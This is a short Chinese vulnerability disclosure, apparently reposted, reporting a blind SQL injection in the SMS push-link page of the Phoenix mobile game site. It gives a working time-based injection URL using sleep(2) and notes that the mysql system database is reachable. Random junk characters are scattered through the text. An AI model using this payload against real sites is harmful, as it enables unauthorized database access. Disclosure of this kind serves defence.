简要描述:# Q6 c% b% G7 ^4 |- F
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。4 p- t4 }9 K' V% a2 Z; Q
/ P9 _# o6 D! I& E0 Y* x: T详细说明:3 m7 ]* R j" I1 ~$ t& s
存在SQL盲注url:1 m7 G+ W4 t- L0 o4 @
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=18 y/ a' h% d1 w; ~0 D
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
+ O. q; i/ s/ D4 ~' Ohttp://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png$ @5 \( x' a0 M$ f
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
) s+ d/ _- o. G9 a& n. ~2 E7 O9 v$ n, F# [) W2 U
能看到mysql系统数据库,看来user权限应该很高的。。 |